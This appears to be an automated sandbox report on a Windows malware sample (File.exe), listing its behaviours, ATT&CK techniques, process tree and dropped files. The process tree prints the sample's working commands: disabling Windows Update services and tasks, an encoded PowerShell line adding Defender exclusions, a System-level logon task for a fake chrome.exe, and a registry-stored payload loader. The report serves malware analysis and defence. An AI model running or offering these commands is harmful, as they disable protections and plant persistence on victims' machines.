8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a

Analysis

max time kernel
150s
max time network
50s
platform
windows7_x64
resource
win7-20220414-en
submitted
05-05-2022 00:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

File.exe
Size

4.0MB
MD5

f74ccaec9935cca19122478058c39f79
SHA1

5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
SHA256

8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
SHA512

2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 652 created 416 652 powershell.EXE winlogon.exe
Executes dropped EXE 2 IoCs

Processes:

[New]344334.exechrome.exe

pid process

1464 [New]344334.exe
1564 chrome.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1876 takeown.exe
1932 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 2 IoCs

Processes:

File.execmd.exe

pid process

1968 File.exe
1800 cmd.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

1932 icacls.exe
1876 takeown.exe

description	pid	process	target process
PID 652 created 416	652	powershell.EXE	winlogon.exe

pid	process
1464	[New]344334.exe
1564	chrome.exe

pid	process
1876	takeown.exe
1932	icacls.exe

pid	process
1968	File.exe
1800	cmd.exe

pid	process
1932	icacls.exe
1876	takeown.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

[New]344334.exepowershell.EXE

description	pid	process	target process
PID 1464 set thread context of 1488	1464	[New]344334.exe	conhost.exe
PID 652 set thread context of 316	652	powershell.EXE	dllhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1436 schtasks.exe

pid	process
1436	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 8014716c2b60d801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1468 reg.exe
1064 reg.exe
792 reg.exe
1720 reg.exe
876 reg.exe
640 reg.exe
888 reg.exe
1980 reg.exe
1292 reg.exe

pid	process
1468	reg.exe
1064	reg.exe
792	reg.exe
1720	reg.exe
876	reg.exe
640	reg.exe
888	reg.exe
1980	reg.exe
1292	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exe[New]344334.exepowershell.EXEpowershell.exedllhost.exepowershell.EXE

pid	process
936	powershell.exe
1464	[New]344334.exe
652	powershell.EXE
652	powershell.EXE
1768	powershell.exe
316	dllhost.exe
316	dllhost.exe
316	dllhost.exe
316	dllhost.exe
1296	powershell.EXE

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exetakeown.exe[New]344334.exepowershell.EXEpowershell.exedllhost.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeDebugPrivilege	1464	[New]344334.exe
Token: SeDebugPrivilege	652	powershell.EXE
Token: SeDebugPrivilege	652	powershell.EXE
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	316	dllhost.exe
Token: SeDebugPrivilege	1296	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

File.exe[New]344334.execmd.execmd.exe

description	pid	process	target process
PID 1968 wrote to memory of 1464	1968	File.exe	[New]344334.exe
PID 1968 wrote to memory of 1464	1968	File.exe	[New]344334.exe
PID 1968 wrote to memory of 1464	1968	File.exe	[New]344334.exe
PID 1968 wrote to memory of 1464	1968	File.exe	[New]344334.exe
PID 1464 wrote to memory of 1736	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1736	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1736	1464	[New]344334.exe	cmd.exe
PID 1736 wrote to memory of 936	1736	cmd.exe	powershell.exe
PID 1736 wrote to memory of 936	1736	cmd.exe	powershell.exe
PID 1736 wrote to memory of 936	1736	cmd.exe	powershell.exe
PID 1464 wrote to memory of 1688	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1688	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1688	1464	[New]344334.exe	cmd.exe
PID 1688 wrote to memory of 508	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 508	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 508	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1132	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1132	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1132	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 652	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 652	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 652	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1800	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1800	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1800	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 852	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 852	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 852	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1292	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1292	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1292	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 876	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 876	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 876	1688	cmd.exe	reg.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1688 wrote to memory of 1720	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1720	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1720	1688	cmd.exe	reg.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1688 wrote to memory of 1468	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1468	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1468	1688	cmd.exe	reg.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1688 wrote to memory of 1064	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1064	1688	cmd.exe	reg.exe
PID 1688 wrote to memory of 1064	1688	cmd.exe	reg.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1464 wrote to memory of 1488	1464	[New]344334.exe	conhost.exe
PID 1688 wrote to memory of 1876	1688	cmd.exe	takeown.exe
PID 1688 wrote to memory of 1876	1688	cmd.exe	takeown.exe
PID 1688 wrote to memory of 1876	1688	cmd.exe	takeown.exe
PID 1688 wrote to memory of 1932	1688	cmd.exe	icacls.exe
PID 1688 wrote to memory of 1932	1688	cmd.exe	icacls.exe
PID 1688 wrote to memory of 1932	1688	cmd.exe	icacls.exe
PID 1464 wrote to memory of 1608	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1608	1464	[New]344334.exe	cmd.exe
PID 1464 wrote to memory of 1608	1464	[New]344334.exe	cmd.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:728

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1112

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:2016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1052

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
PID:860

C:\Windows\system32\taskeng.exe
taskeng.exe {307F549C-3BA7-440B-AF12-7AAFCA878E60} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:580

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4320cbb5-f26c-4b91-9b9a-aafe21e9d9f5}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1536

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1188

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Roaming\[New]344334.exe
C:\Users\Admin\AppData\Roaming\[New]344334.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
4⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:508

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:1132

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:652

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:852

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1292

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:1800

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:876

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1720

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1468

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1064

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1932

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:640

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:888

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1980

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:792

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1780

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1164

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1372

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:960

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:1488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
4⤵
PID:1608

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
5⤵
- Creates scheduled task(s)
PID:1436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
4⤵
- Loads dropped DLL
PID:1800

C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
5⤵
- Executes dropped EXE
PID:1564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
6⤵
PID:1980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1152

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1660180236-14071650272055824007-1945024661-11155948661657438746-1705177950-335628292"
1⤵
PID:684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19737764191576139554-2067442504-1968482598-10623863511052252383-12340606811604665813"
1⤵
PID:1720

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
Filesize
38.9MB

MD5
4b44b0c549270225104496c3ede54e7d

SHA1
79bc1c2dd57554d0a8166ee779d33c401736bf30

SHA256
7e6583912317286fb4254adf4c5f74ca55f90f7bd7ed15f4cbfd4734f6d5e0f4

SHA512
3c82b19e8d28a1b1494fd3209904f77219ffbe0cebb88ba0c967f3afa613ab15404093b2e8a5830ad3676abac48b97217f6f02244382f6a4ffd6d03f164e54a2

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
Filesize
40.1MB

MD5
f9e6e6254a07ed57c1fd062bfd5a8417

SHA1
cffef028892c0cb1335929c2260db1ca2b8aed3a

SHA256
6d08025177f0755c983ba484224c2e716fe1fbe4e2574a7be5fe6d4701ef9d07

SHA512
c32855b9bfe6aba3cb99784916fecd553b4c2eae5af7ea371ee671c251bf6e83c7aff62af9ecba203faa09aa7eade3b3a29d8a11c00e949d36eecfb50fddbf31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4792f8e38b8d1f178b8cbf48893bc3e0

SHA1
b4eadc9bfb23b2a46fd2f3702cc9e0dc9376bc69

SHA256
6b29e35d4e7e1eaf6fdd74dd80a5d8f0ae31c724db56e0c7d6a583dd090a5e0c

SHA512
e396e5a85e1bfb2d21c4ffe35d985b79e6015f11a472f964c77e3937375210d1f035d052e2df14fbadc5331791b4afe1e642e7fc6c2b7878fbfe902b4d07730b

Download Submit
C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
462.5MB

MD5
ed65102389423908e08db2e85bba08b5

SHA1
854c17c93268468a95fc6cac28e91a6101c78510

SHA256
ca9d114c4f0b36bbcb76f645eb580625ad6a6b9c7b9be35575a3502cc154b5f3

SHA512
d2d9562eba86735162d410a5adbd4f18384fca39d90e1724d6baceab94e5dc4683188acdc753c410c4a3af5f1016e54bc51e9f73efc042f77cd709df63db9d20

Download Submit
C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
380.2MB

MD5
3108ea6fc6d804599402cb446822d2f4

SHA1
35576c9c76ec7f39ce7733762bd5178dfc6b8e9c

SHA256
29baed532cb9d593f1212b2c47de29484b946124c4af20a84e5641cd8d7c3263

SHA512
1805ea55677033fe82fe4e5ef9623f70bdc37d3c84af757253d5565abaf86ed55adf5264009f6abd43d2429ba82da68db23389e199930292e07e3ae63fff9202

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\Chrome\chrome.exe
Filesize
38.0MB

MD5
750940dce891d6d80d2d5de3fc7a5307

SHA1
0bd1e3e8980191fddb36b4a780afffe059d6d480

SHA256
f071184f7e44b45c4ebfa47d52370e3d8aca9a341fe34f0a21301cb99bc73b2d

SHA512
3b5f416284b6513c78b4accc412183dd0ad62ba6c4100b67199847c76adbae642f6d30b7af541fa895916f55374721687a7fc03a4f414ad693fa49a78ce9dbd6

Download Submit
\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
441.2MB

MD5
c477f3a6015e6b247fd8d7b4b8650daa

SHA1
fdc8215f3217c885adfb83b9f51782dbb91ab146

SHA256
08e0924dbf17213ecfa568eb1db794ff3c44365e23b8e4620af9cfc4ac4723f8

SHA512
59e6fa488d5b1e43a1dd98f42eece33345cbd07e336560576ef6ee11e1aebd687cfd45fa20120375df79f256eec4076185f2e4c0cd29e727742a906fdbc151b7

Download Submit
memory/316-133-0x00000001400024C8-mapping.dmp

Download
memory/316-132-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/316-138-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/316-141-0x00000000771C0000-0x00000000772DF000-memory.dmp

Filesize
1.1MB

Download
memory/316-143-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/316-144-0x00000000772E0000-0x0000000077489000-memory.dmp

Filesize
1.7MB

Download
memory/316-140-0x00000000772E0000-0x0000000077489000-memory.dmp

Filesize
1.7MB

Download
memory/416-151-0x0000000037320000-0x0000000037330000-memory.dmp

Filesize
64KB

Download
memory/416-145-0x0000000000A60000-0x0000000000A83000-memory.dmp

Filesize
140KB

Download
memory/416-148-0x000007FEBED00000-0x000007FEBED10000-memory.dmp

Filesize
64KB

Download
memory/416-162-0x0000000000B90000-0x0000000000BBA000-memory.dmp

Filesize
168KB

Download
memory/416-150-0x0000000000A60000-0x0000000000A83000-memory.dmp

Filesize
140KB

Download
memory/464-154-0x000007FEBED00000-0x000007FEBED10000-memory.dmp

Filesize
64KB

Download
memory/464-156-0x0000000037320000-0x0000000037330000-memory.dmp

Filesize
64KB

Download
memory/472-161-0x0000000037320000-0x0000000037330000-memory.dmp

Filesize
64KB

Download
memory/472-158-0x000007FEBED00000-0x000007FEBED10000-memory.dmp

Filesize
64KB

Download
memory/480-164-0x000007FEBED00000-0x000007FEBED10000-memory.dmp

Filesize
64KB

Download
memory/480-172-0x00000000001B0000-0x00000000001DA000-memory.dmp

Filesize
168KB

Download
memory/480-166-0x0000000037320000-0x0000000037330000-memory.dmp

